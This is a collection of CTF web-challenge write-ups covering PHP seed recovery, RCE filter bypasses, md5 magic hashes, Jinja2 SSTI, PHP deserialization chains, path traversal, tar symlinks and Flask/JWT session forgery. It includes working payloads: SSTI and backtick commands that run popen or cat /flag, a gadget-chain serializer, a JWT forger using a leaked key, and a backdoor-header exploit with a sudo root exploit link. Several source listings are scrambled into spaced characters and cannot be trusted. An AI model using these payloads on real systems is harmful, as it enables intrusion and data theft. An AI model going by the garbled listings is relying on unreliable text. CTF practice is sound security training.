$_SESSION['seed']=rand(0,999999999);
}
mt_srand($_SESSION['seed']);

The seed is a random value from a bounded range.

PHP seeds can be recovered with php_mt_seed:

./php_mt_seed 24 24 0 61 47 47 0 61 47 47 0 61 1 1 0 61 5 5 0 61 27 27 0 61 31 31 0 61 28 28 0 61 16 16 0 61 45 45 0 61

The first two numbers pin the value exactly: 24 means the 24th character of $str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ", and the range is 0 to 61; the rest follow the same pattern. Then just run it.

Brute force

< f } ? o p r h p ( e m $ $ $ $ f } $ i } $ c t s t l s o s f i h _ t a e t r t = o s r r n r r ( 0 r _ g 1 ( $ s $ e e ; $ a l e = $ s h s c c i n o t = ' i t o t h h $ . d n ' n r w r o o i " ( g = 2 ; . s < \ $ 1 0 = = = h $ $ = n i " ; s o s t 9 " ) = y 0 u s w t a 9 ; ; L ; b u r r 9 " L s b = ; g 9 a b $ t s = e 9 b f i r t t 9 c 1 n ( r $ ; 9 d 5 $ ( t 9 e 2 < s $ a 9 f q t s r g J $ r t g ; h " l _ r e i ; e l , t $ j n o ) i k 1 n 0 + l ; g , { + m 1 n $ , 1 ) o i 0 p n m ) { q + t ; r + _ s r t ) a u { n v d w ( x 0 y , z 0 s 1 t 2 r 3 l 4 e 5 n 6 ( 7 $ 8 s 9 t A r B _ C l D o E n F g G 1 H ) I J - K L 1 M ) N , O P 1 Q ) R ; S T U V W X Y Z " ;

This comes down to luck; in the write-ups someone brute-forced for several hours.

[SWPUCTF 2021 新生赛]hardrce

Bypass using bitwise NOT.

< h e h i { i { } e e } e { } ? ? e r i f f c v l > p a r g ( ( h a s h d o h i p o l e p e r l s $ $ f { } r d ( e r _ i s w b o } e i " $ c ( r g e l l r g e N w h " e h t l a e _ ( o l o C p t ( m c a i d m " V l o o _ $ k c f i a R i m " n r f _ = l h e t a c ) t t i G i ( ( c ' 4 ; e i l E $ s ( p " h s n n e T _ t $ r L ( t g ( [ G b e T ' A - ( _ ' E = l g L / l T 0 _ w T a _ T [ y ) F l [ [ c m a G p ; I l ' ' k a - h e L m w l t z u : E ' l ' i c A l t _ ] l , s h - " e _ ) m ' t ( Z ; x ) ) ' \ ' ] t ; ] t a / / / ; ' s ' i h , s f t ' $ . ' l m \ b , a l r l $ $ " g ; ' a b w ) c , c l l ; h ' k a " l " a \ i c ) m ; r n t k ; ) s ' e i ) e , m t t ' ) e = \ m u + t ' . f , - ' 8 \ / " [ m ) ' ' ; , , ' \ $ ^ w ' l , l ' m \ ) ] ) ' , { ' \ " ' , ' \ ' , ' \ $ ' , ' \ * ' , ' \ ? ' , ' \ < ' , ' \ > ' , ' \ = ' , ' \ ` ' , ] ;

It filters /[a-zA-Z]/is.

One can use

<?php echo urlencode(~'cat /flllllaaaaaaggggggg');

and bypass the filter with the inverted form (~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);

[WUSTCTF 2020]朴实无华

A comparison challenge, testing understanding of PHP.

< h e h i } } i } } i } } ? ? e r i / f e / f e / f e > p a r g l l l l g l h d o h e ( s e ( $ i e s e ( s p e r l v i $ i } } e d v i m f l e d t i $ i } } e d r _ i e s n f e { i e s d s { i s g f e { i ( r g l s u ( l e l s 5 ( e e f s e ( l e ' e h e m i s ( e = $ e d ( l e t ! s ( C p t 1 t n e e d " 2 t $ m c i " a t _ s $ e s e d " o o _ ( = t c { i ( _ d h e g ( f t g c y { i n r f $ v h e $ G 5 o ( $ l r e h s e t t i _ $ a o ( _ E = " _ a s t o t ( e i l G _ l " G T = " G g t _ e " n n e E G ( " " E [ m " E r f " m " t g ( T E $ ) T ' d ) T = ( l ( ) - ( _ [ T n ; [ m 5 ; [ $ a $ ; t 0 _ ' [ u ' d ( ' $ g g g y ) f n ' m m 5 $ C g _ e e p ; i u n ) d ' m T e G t = , t " e l m u 5 ] d F t E _ _ ) : e ' m < ' ; 5 e _ T f s f ; t _ ] ' ] ) r f [ l t l e _ ) ] 2 ) ) l ' a r a x ) ) ; 0 ) , a g g _ g t ; { 2 { f g e , i ) / 0 l ' t " r ; h " a ] _ e , t & , ) g ) f " p m & ; ) l ) l l , { a ) a ; i g { c c n , ' e h t ] ( a v ; " r a c s l , , a e ( t t $ " = n , u u t m " f w - + , c 8 " t ' 1 , ) f ) ) ; 2 , ; 0 > 2 0 2 , " 0 , . 2 < 1 $ / ) g b { e r t > . _ " < , f ; / l b a r g > ) " ; ; , , , . < / b r > " ;

level 1

if(intval($num)<2020&&intval($num+1)>2021)

The number must be less than 2020 and, after adding 1, greater than 2021.

In a PHP 5 environment.

The principle is that in PHP 5 intval() does not parse scientific notation.

level2

if($md5==md5($md5))

md5 weak comparison; use a value that itself starts with 0e and whose md5 also starts with 0e:

0e1137126905
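Added example, not from the original write-up, covering the md5 comparisons in easy_md5 and level 2 here: a Python model of PHP's loose string comparison that shows why 0e hashes get past == and why array arguments get past ===, next to a hardened check. QNKCDZO and 240610708 are well-known magic-hash inputs used as sample data; the PHP semantics are approximated as the comments describe.

```python
"""PHP's == on md5() output, modelled in Python, beside the hardened check."""
import hashlib
import hmac
import re

# PHP numeric-string grammar: optional whitespace and sign, integer or float,
# optional exponent. When both operands of == match, PHP compares numerically.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")
_INTEGER = re.compile(r"^\s*[+-]?\d+\s*$")


def php_loose_eq(a, b) -> bool:
    """Approximates PHP 8 `==` for the string/NULL values used below."""
    if a is None or b is None:
        return a is b                    # NULL == NULL; other NULL cases simplified
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        if _INTEGER.match(a) and _INTEGER.match(b):
            return int(a) == int(b)      # pure digit strings compare exactly
        return float(a) == float(b)      # "0e123" and "0e456" are both 0.0
    return a == b


def php_md5(value):
    """md5() of a string; PHP returns NULL (plus a warning) for an array argument."""
    if isinstance(value, (list, dict)):
        return None
    return hashlib.md5(str(value).encode()).hexdigest()


def is_magic_hash(digest: str) -> bool:
    """0e followed only by digits: loosely equal to every other such digest."""
    return re.fullmatch(r"0e\d+", digest) is not None


def check_loose(a, b) -> bool:
    """Mirrors if($a != $b && md5($a) == md5($b)) from easy_md5."""
    return a != b and php_loose_eq(php_md5(a), php_md5(b))


def check_strict_untyped(a, b) -> bool:
    """Mirrors $a !== $b && md5($a) === md5($b) with no is_string() guard:
    two different arrays both hash to NULL, and NULL === NULL."""
    return a != b and php_md5(a) == php_md5(b)


def self_loop(value: str) -> bool:
    """Mirrors $md5 == md5($md5) from level 2 above."""
    return php_loose_eq(value, php_md5(value))


def check_fixed(a, b) -> bool:
    """Hardened form: reject non-strings, compare digests in constant time."""
    if not (isinstance(a, str) and isinstance(b, str)):
        return False
    return a != b and hmac.compare_digest(php_md5(a), php_md5(b))


# Well-known magic-hash inputs used as sample data: both digests start with 0e.
MAGIC_PAIR = ("QNKCDZO", "240610708")
```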

level3

if(!strstr($get_flag," "))
str_ireplace("cat","wctf2020",$get_flag);

Spaces are filtered and cat is not allowed; bypass with tac.

[NSSRound#18 Basic]Becomeroot

First there is a phpinfo page.

The hint says the flag is in root.

The info page contains a hint.

A search shows this is a backdoor and the version number matches; the way to use it:

P H A A A U U U C O o c c c p s s o S s c c c g e e n T t e e e r r r t : p p p a - - e / t t t d A A n n : - - e g g t H o E L - e e - T d t n a I n n T T e e c n n t t y P 4 x o g s : t p / . t d u e : e 1 a / i a c M : . n h n g u o z 1 n t g e r z e a a m : : e i r p . l - l o p n , g z R l d l s a z h e a i i s p i - q / u c c p p C u 5 m a t l , N e . s t f i , s 0 y i . c d z t s o c a e h s ( t n n t f ; : X e / : i l q 1 m x 2 o a = 1 1 ( - 8 n t 0 ; ' w 1 / e . e w 4 x 9 L c w 2 h i h - t n o f m u o l x " r + < m x x ? - m 8 p u l 6 h r , _ p l a 6 e p 4 e n p ) v c l a o i A l d c p ( e a p \ d t l $ i e _ o W P n e O / b S x K T m i [ l t 1 ; / ] q 5 ) = 3 ; 0 7 " . . 9 3 > , 6 i m ( v a K a g H r e T / / M w a L w v , w i / f l h , i t i k m m e l a / g G 1 e e . / c p w k h e o p b ) ' p ) , C ; i h m r a o g m e e / / a 1 p 3 n 2 g . , 0 * . / 0 * . ; 0 q = S 0 a . f 8 a , r a i p / p 5 l 3 i 7 c . a 3 t 6 i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 7

That gives a low-privileged user shell, but privilege escalation is still needed; find turns up nothing, there is no SUID binary. Later I saw in a write-up that the vulnerability is in sudo.

Version 1.8.31 has a privilege-escalation exploit: https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit

[NCTF 2018]flask真香

A basic SSTI challenge with a simple bypass.

The injection point is at

http://node7.anna.nssctf.cn:20254/{{7*7}}

But there is keyword filtering, which can be bypassed by splitting keywords; if output is expected but does not appear, something is being filtered.

{{''['__cla''ss__'].__bases__[0]['__subcl''asses__']()[70].__init__.__globals__['__built''ins__']['ev''al']("__im""port__('o''s').po""pen('cat /Th1s_is__F11114g').read()")}}

[UUCTF 2022 新生赛]ez_rce

A simple RCE.

<?php
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if(!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){
        eval($code);
    }else{
        echo "<br>";
        // (rejection message not legible in this copy)
    }
}
(reconstructed from the garbled listing: the regex and the control flow are legible, the echo messages are not)

I overcomplicated this, trying bitwise-NOT encoding to get execution, when backticks (shell_exec) are not in the blocklist and execute directly. Then use

print_r();

to print the result, breaking up the filtered words with '' (an empty quoted string inside the command word, which the shell removes during quote removal). Payload:

print_r(`ca''t /ffffffffffla''gafag`);
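An added example (not from the writeup) that replays both halves of this bypass offline: the preg_match blocklist above, translated one-to-one into a Python regex, decides whether a payload reaches eval(), and shlex reproduces the shell's quote removal to show what the backtick command actually executes. The file name /flag is a placeholder.

```python
import re
import shlex

# The preg_match() blocklist from the ez_rce source, as a Python regex.
# PHP's /i flag is re.IGNORECASE; \$ \* \+ \^ \. are literal characters in both engines.
BLOCKLIST = re.compile(
    r"sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan"
    r"|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell",
    re.IGNORECASE,
)


def passes_filter(code: str) -> bool:
    """True when the PHP would fall through to eval($code)."""
    return BLOCKLIST.search(code) is None


def backtick_command(code: str):
    """PHP runs `...` through shell_exec(); pull the command text out of the payload."""
    m = re.search(r"`([^`]*)`", code)
    return m.group(1) if m else None


def shell_sees(cmd: str) -> list:
    """argv after the shell's quote removal: ca''t -> cat, the empty '' disappears."""
    return shlex.split(cmd)


def check_payload(code: str):
    """Return the argv the shell would run, or None if the filter stops the payload first."""
    if not passes_filter(code):
        return None
    cmd = backtick_command(code)
    return shell_sees(cmd) if cmd else []


if __name__ == "__main__":
    for p in ("print_r(`cat /flag`);", "print_r(`ca''t /fl''ag`);", "system('id');"):
        print(p, "->", check_payload(p))
```

The filter matches substrings, not tokens, so any word that contains a listed fragment (for example "im" inside "import") is caught; the quote trick only helps inside the backticks, because the PHP side of the payload never contains the split word.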

I didn't see it right away; I should have.

[GDOUCTF 2023]hate eat snake

JS code audit.

My general approach: if the JS is obfuscated, don't fight the obfuscation head-on; usually only the part that produces the flag is obfuscated. Changing the win condition, or changing the difficulty, solves it just as well.

Here, for example, you can disable the code that advances the timer and then play for 60 seconds, or set the score counter straight to the maximum.

clearInterval(this.snakeTimer);
(the second line shown in the original, the score/speed assignment, is not legible in this copy)

[NISACTF 2022]babyserialize

Sigh, deserialization.

(Source reconstructed from the garbled listing: the class and property names, the magic methods and the hint()/checkcheck() calls are legible.)

<?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup(){
        if($this->fun=="show_me_flag"){
            hint();
        }
    }
    function __call($from,$val){
        $this->fun=$val[0];
    }
    public function __toString(){
        echo $this->fun;
        return " ";
    }
    public function __invoke(){
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}
class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup(){
        $this->ext->nisa($this->x);
    }
}
class Ilovetxw{
    public $huang;
    public $su;
    function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }
    function __toString(){
        $bb = $this->su;
        return $bb();
    }
}
class four{
    public $a="TXW4EVER";
    private $fun='abc';
    public function __set($name, $value){
        $this->$name = $value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}
if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

First find the entry point and the sink.

The entry is TianXiWei::__wakeup() and the sink is NISA::__invoke().

The entry __wakeup() calls $this->ext->nisa($this->x); with $ext pointing to an Ilovetxw, the undefined method call fires Ilovetxw::__call, which assigns $this->huang->fun. Point huang at a four object: fun is private there, so the assignment from outside the class goes through four::__set instead,

with public $x = 'sixsixsix' as the value being assigned.

__set then calls strtolower($this->a); point $a->ext->huang->a at another Ilovetxw so that its __toString() runs, set its $su to a NISA, and the $bb() call triggers NISA::__invoke(), which evals txw4ever. (NISA::__wakeup only calls hint() when fun is still "show_me_flag", so give fun any other value.)

Not hard; mainly a test of how well you know the magic methods. Without that fluency it is tiring to work through.
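The chain above can be emitted without a PHP interpreter. The following is an added example (not from the writeup): a minimal PHP serialize() in Python, including the \0Class\0name encoding of private properties, used to build the TianXiWei -> Ilovetxw -> four -> Ilovetxw -> NISA object graph. The PHP code placed in txw4ever is a placeholder; whatever checkcheck() in waf.php rejects is not described on the page.

```python
from dataclasses import dataclass, field


@dataclass
class PhpObject:
    cls: str
    props: dict                                   # public properties, in order
    private: dict = field(default_factory=dict)   # private ones: serialised as "\0Class\0name"


def _php_str(s: str) -> str:
    # PHP counts bytes, and the NUL bytes of a private name count too
    return f's:{len(s.encode())}:"{s}";'


def php_serialize(v) -> str:
    """Minimal serialize() for None/bool/int/str/PhpObject (enough for a gadget chain)."""
    if v is None:
        return "N;"
    if isinstance(v, bool):
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return _php_str(v)
    if isinstance(v, PhpObject):
        items = list(v.props.items()) + [
            (f"\x00{v.cls}\x00{k}", val) for k, val in v.private.items()
        ]
        body = "".join(_php_str(k) + php_serialize(val) for k, val in items)
        return f'O:{len(v.cls)}:"{v.cls}":{len(items)}:{{{body}}}'
    raise TypeError(type(v))


def build_chain(php_code: str) -> str:
    """TianXiWei::__wakeup -> Ilovetxw::__call -> four::__set -> Ilovetxw::__toString -> NISA::__invoke."""
    # fun must not be "show_me_flag", or NISA::__wakeup only calls hint()
    nisa = PhpObject("NISA", {"fun": "not_the_hint", "txw4ever": php_code})
    sink = PhpObject("Ilovetxw", {"su": nisa})          # __toString: $bb = $this->su; return $bb();
    four = PhpObject("four", {"a": sink})               # __set: strtolower($this->a) -> __toString
    hop = PhpObject("Ilovetxw", {"huang": four})        # __call: $this->huang->fun = $arg[0] -> __set
    entry = PhpObject("TianXiWei", {"ext": hop, "x": "sixsixsix"})  # __wakeup: $this->ext->nisa($this->x)
    return php_serialize(entry)


if __name__ == "__main__":
    print(build_chain("phpinfo();"))
```

The payload goes in ?ser= URL-encoded; properties left out of an object keep their class defaults after unserialize(), which is why four's private $fun does not need to appear (it still exists, and its privacy is what routes the assignment into __set).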

[NISACTF 2022]babyupload

A less common Python bug.

Code (reconstructed from the garbled listing; the sqlite/uuid bookkeeping, the filename check, the save path and the os.path.join read are legible):

from flask import Flask, request, redirect, g, send_from_directory
import sqlite3
import os
import uuid

app = Flask(__name__)

def db():
    g_db = getattr(g, '_database', None)
    if g_db is None:
        g_db = g._database = sqlite3.connect("database.db")
    return g_db

@app.route('/')
def index():
    return open(__file__).read()

@app.route('/upload', methods=['POST'])
def upload():
    if 'file' not in request.files:
        return redirect('/')
    file = request.files['file']
    if "." in file.filename:
        return "Bad filename!", 403
    conn = db()
    cur = conn.cursor()
    uid = uuid.uuid4().hex
    try:
        cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))
    except sqlite3.IntegrityError:
        return "Duplicate file"
    conn.commit()
    file.save('uploads/' + file.filename)
    return redirect('/file/' + uid)

@app.route('/file/<id>')
def file(id):
    conn = db()
    cur = conn.cursor()
    cur.execute("select path from files where id=?", (id,))
    res = cur.fetchone()
    if res is None:
        return "File not found", 404
    with open(os.path.join("uploads/", res[0]), "r") as f:
        return f.read()

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

The key is open(os.path.join("uploads/", res[0]), "r"): os.path.join discards every earlier component as soon as a later component is an absolute path, so a stored filename that starts with / escapes the uploads directory when it is read back.

filename=/flag does it: the only filename check is the absence of ".", which a leading slash passes.
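An added example (not the challenge's code) showing the os.path.join behaviour next to a containment check that rejects both the absolute-path trick and ../ traversal. It resolves symlinks with realpath before comparing, so a link planted inside the upload directory cannot point outside it either. The directory name "uploads" is arbitrary.

```python
import os


def vulnerable_path(base: str, name: str) -> str:
    """What the challenge does: an absolute second component discards 'base' entirely."""
    return os.path.join(base, name)


def safe_join(base: str, name: str):
    """Return the real path of base/name only if it stays inside base, else None."""
    base_real = os.path.realpath(base)
    # realpath resolves '..' and symlinks; join with the already-resolved base
    target = os.path.realpath(os.path.join(base_real, name))
    # the directory itself is not a file to serve, and commonpath must be base
    if target == base_real or os.path.commonpath([base_real, target]) != base_real:
        return None
    return target


if __name__ == "__main__":
    for name in ("/flag", "../etc/passwd", "a/b.txt", ""):
        print(repr(name), vulnerable_path("uploads/", name), safe_join("uploads", name))
```

Werkzeug ships the same idea as werkzeug.utils.safe_join, and Flask's send_from_directory already applies it; the challenge's bug is that the read path bypasses both by calling open() on a raw os.path.join.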

[NSSRound#13 Basic]flask?jwt?(hard)

Flask session forgery.

Find the key.

It is visible on the page shown after login.

That page has to be requested while not logged in; the secret key then appears in the error output (the debug traceback).

neko@neko205 [flask_session]$ python3 flask_session_cookie_manager3.py decode -c "<session cookie>"
{'_fresh': True, '_id': '<hash>', '_user_id': '<id>', 'time': datetime.datetime(...)}
(cookie, hash and id values are not legible in this copy)

Forge with the key:

neko@neko205 [flask_session]$ python3 flask_session_cookie_manager3.py encode -s "<SECRET_KEY from the traceback>" -t "{'_fresh': True, '_id': '<hash>', '_user_id': '1', 'time': 'datetime.datetime(2025, 2, 9, 3, 10, 50, tzinfo=datetime.timezone.utc)'}"

[GHCTF 2024 新生赛]理想国

Visiting the site returns JSON; I skimmed it with an AI assistant.

(API description, garbled in this copy: it lists the register and login endpoints under the API's v0 path and states that the file endpoint requires the token returned by login.)

So a token is needed to reach the file endpoint; register first.

Log in to obtain a user token.

With it there is an arbitrary file read.

Reading the /proc/self pseudo-files gives information about the serving process itself.

For example /proc/self/cmdline shows the command line (and so the script's filename) and /proc/self/environ the process environment.

The key item there: SECRET_KEY=B3@uTy_L1es_IN_7he_EyEs_0f_Th3_BEh0ld3r

Next, read the source code.

Reading it, the flag route is:

@app.route('/enterIdealState', methods=['GET'])
@check_token
def enter_ideal_state():
    ...
    flag = open('/flag').read()
    return ...
(reconstructed from the garbled listing: the route, the decorator and the flag read are legible, the handler name is not)

The check:

def check_token(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        token = request.headers.get('Authorization')
        if not token:
            return ..., 401
        try:
            payload = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
        except Exception:
            return ..., 401
        if payload.get('username') != 'Plato':
            return ..., 403
        return f(*args, **kwargs)
    return decorated
(reconstructed outline: jwt.decode with app.config['SECRET_KEY'] and HS256, the 401/403 responses and the Plato identity check are legible; the claim name and the header the token is read from are assumptions)

So: call /enterIdealState with Plato's token. Since the signing key is already known, forge one at https://www.bejson.com/jwt/ (HS256, a payload naming Plato, secret = the SECRET_KEY above).

Visit /enterIdealState.
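The forgery can be done without a website or PyJWT. The following is an added example (not from the writeup): it parses a constructed /proc/self/environ dump into a dict, mints an HS256 token with the recovered SECRET_KEY, and verifies it while refusing any other alg. The "username" claim name is an assumption; the page does not show the claim the app checks.

```python
import base64
import hashlib
import hmac
import json


def _b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def _b64url_dec(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def parse_environ(raw: bytes) -> dict:
    """/proc/self/environ is KEY=VALUE entries separated by NUL bytes."""
    env = {}
    for item in raw.split(b"\x00"):
        if b"=" in item:
            k, v = item.split(b"=", 1)
            env[k.decode()] = v.decode()
    return env


def jwt_hs256_encode(payload: dict, secret: str) -> str:
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"


def jwt_hs256_decode(token: str, secret: str):
    """Return the payload if the signature is valid and alg is HS256, else None."""
    try:
        h, b, s = token.split(".")
    except ValueError:
        return None
    if json.loads(_b64url_dec(h)).get("alg") != "HS256":   # no "none", no alg confusion
        return None
    expected = hmac.new(secret.encode(), f"{h}.{b}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_dec(s)):
        return None
    return json.loads(_b64url_dec(b))


# Constructed stand-in for what the file-read endpoint returned for /proc/self/environ
SAMPLE_ENVIRON = (
    b"PATH=/usr/local/bin:/usr/bin\x00HOSTNAME=web\x00"
    b"SECRET_KEY=B3@uTy_L1es_IN_7he_EyEs_0f_Th3_BEh0ld3r\x00"
)


def forge_plato_token(environ: bytes = SAMPLE_ENVIRON) -> str:
    secret = parse_environ(environ)["SECRET_KEY"]
    return jwt_hs256_encode({"username": "Plato"}, secret)


if __name__ == "__main__":
    tok = forge_plato_token()
    print(tok)
    print(jwt_hs256_decode(tok, parse_environ(SAMPLE_ENVIRON)["SECRET_KEY"]))
```

Send the result in whatever header or cookie the app reads its token from; the token's signature covers exactly the two base64url segments, so any edit to the payload needs a fresh signature with the same key.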

[HNCTF 2022 WEEK3]ssssti

Underscores and quotes are filtered.

Bypass by pulling the names out of request.

{{()[request.cookies.class][request.cookies.bases][0][request.cookies.subclasses]()}}

The filtered names travel in the Cookie header:

class=__class__;bases=__bases__;subclasses=__subclasses__

Suppose the goal is to run

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

By the same logic it becomes

{{config[request.cookies.class][request.cookies.init][request.cookies.globals][request.cookies.so].popen(request.cookies.cmd).read()}}
class=__class__;init=__init__;globals=__globals__;so=os;cmd=ls /

[NSSRound#6 Team]check(V1)

A neat solving idea.

Read the code first.

File upload.

@app.route('/upload', methods=['POST'])
def upload():
    if 'file' not in request.files:
        return redirect('/')
    file = request.files['file']
    if '..' in file.filename or file.filename.startswith('/'):
        return 'Bad filename'
    path = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)
    file.save(path)
    if tarfile.is_tarfile(path):
        with tarfile.open(path) as tar:
            for member in tar.getmembers():
                if '..' in member.name or member.name.startswith('/'):
                    return 'Bad path'
            tar.extractall(app.config['UPLOAD_FOLDER'])
    return redirect('/')

@app.route('/download')
def download():
    filename = request.args.get('filename')
    if '..' in filename or not os.path.isfile(os.path.join(app.config['UPLOAD_FOLDER'], filename)):
        return 'Not found'
    return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
(reconstructed outline of the two garbled routes: the tar check, the '..' and leading-slash filters on member names, extractall and send_from_directory are legible; the message strings are placeholders)

It is a file upload that accepts only tar archives. Member names are checked for path traversal, but nothing checks for symbolic links, so upload a tar that contains a symlink to /flag: after extraction the download route serves the link target.

payload:

neko@neko205 [~]$ ln -s /flag flag
neko@neko205 [~]$ tar -cvf flag.tar flag

<form method="POST" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit">
</form>
(the upload form; the page's HTML is garbled in this copy)
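The missing check can be shown in a few lines. The following is an added example (not the challenge's code): it builds in memory the same archive that ln -s /flag flag; tar -cvf flag.tar flag produces, and lists the members that a name-only '..' check lets through: symlinks and hardlinks, absolute or traversing names, and device nodes.

```python
import io
import os
import tarfile


def make_symlink_tar(link_name: str = "flag", target: str = "/flag") -> bytes:
    """In-memory equivalent of: ln -s /flag flag; tar -cvf flag.tar flag"""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(link_name)
        info.type = tarfile.SYMTYPE
        info.linkname = target
        tar.addfile(info)             # a symlink member carries no data
    return buf.getvalue()


def make_regular_tar(name: str = "hello.txt", data: bytes = b"hi\n") -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def unsafe_members(tar_bytes: bytes) -> list:
    """Member names that must not be extracted into a served directory."""
    bad = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for m in tar.getmembers():
            if m.issym() or m.islnk():
                bad.append(m.name)        # the name is clean, the target is not
            elif os.path.isabs(m.name) or os.path.normpath(m.name).startswith(".."):
                bad.append(m.name)        # absolute path or traversal after normalisation
            elif not (m.isfile() or m.isdir()):
                bad.append(m.name)        # char/block devices, fifos
    return bad


if __name__ == "__main__":
    print(unsafe_members(make_symlink_tar()))       # ['flag']
    print(unsafe_members(make_regular_tar()))       # []
```

On Python 3.12 and later, tarfile.extractall(path, filter="data") applies equivalent rules itself and raises on links that point outside the destination; on older versions the check has to be written out as above.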

[NSSRound#13 Basic]ez_factors

Description: a native Linux factorization tool; the flag is in the root directory.

The bug is command injection by chaining a second command onto the one being run. Learned a command along the way: od turns a file's bytes into numbers, which gets the flag past any output that only accepts digits:

od -An -t o1 /flag

Then convert the octal bytes back to text.

[MoeCTF 2022]ezphp

(Source, garbled in this copy. Legible parts: highlight_file(__FILE__); a $flag variable that comes from a separate file; a $getout message; the exit check and the foreach loop quoted below.)

Key part:

if($_POST['flag']==='flag'||$_GET['flag']==='flag'){
    exit($getout);
}
(the operator between the two conditions was eaten by the page rendering; it must be || for the author's reasoning below to hold)

Without this check, passing flag=flag would reach

foreach($_GET as $key=>$value){
    $$key=$$value;
}

which brings the flag out.

So go around it: ?a=flag&flag=a. The loop first does $a = $flag (the real flag), then $flag = $a, which is equivalent to flag=flag without either parameter literally being 'flag'.

[安洵杯 2020]Normal SSTI

Needs a bypass. Quick testing shows {{ }}, config, ., _, [ ] and more are filtered.

Use |attr with unicode escapes:

{%print(lipsum|attr(%22\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f%22))%}

Testing shows lipsum is not filtered.

lipsum is the Jinja2 global that generates lorem ipsum text, a plain Python function, so lipsum.__globals__ is the globals dict of the module that defines it (jinja2.utils), and that module imports os. From there it is os.popen.

So the payload becomes (the readable form first, then the same with every name as \uXXXX escapes):

{%print(lipsum|attr('__globals__')|attr('get')('os')|attr('popen')('cat /flag')|attr('read')())%}

{%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22)|attr(%22\u0067\u0065\u0074%22)(%22\u006f\u0073%22)|attr(%22\u0070\u006f\u0070\u0065\u006e%22)(%22\u0063\u0061\u0074\u0020\u002f\u0066\u006c\u0061\u0067%22)|attr(%22\u0072\u0065\u0061\u0064%22)())%}

Dictionary of filtered tokens (the page's rendering stripped the paired underscores from the dunder names; restored here):

{ } " ' ) config . = + % > >= <= == != ; \n \r \t , eval exec compile input getattr setattr globals locals open os system subprocess popen __class__ __dict__ __getattr__ __setattr__ __globals__ __builtins__ __subclasses__ __mro__ __call__ __init__ import __import__ from as sys os socket subprocess .get() .setdefault() .items() .keys() values() [] # {% %} {{ }}

[CISCN 2019华东南]Web4

Flask session forgery.

The site has an arbitrary file read. file:// is blocked, but local_file:// works: the regex only rejects URLs that start with "file", and Python 2's urllib.urlopen still treats local_file as a local path scheme.

Source audit (reconstructed from the garbled listing; the seed, the SECRET_KEY line, the two regexes and the session check are legible):

# encoding:utf-8
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=http://127.0.0.1/">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.h').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(debug=True, host="0.0.0.0")

The key point:

random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)

uuid.getnode() returns the machine's MAC address as a 48-bit integer; it seeds the PRNG, and the key is the first random float times 233. On Linux the MAC can be read through the file read from /sys/class/net/<interface>/address.

The MAC is hex; turn it into an integer and reproduce the number in a Python 2 environment:

>>> random.seed(0x0242ac0230fc)
>>> print(str(random.random()*233))
137.927888445
(the MAC integer is transcribed from the garbled listing as far as it is legible)

Then forge the cookie with flask_session_cookie_manager:

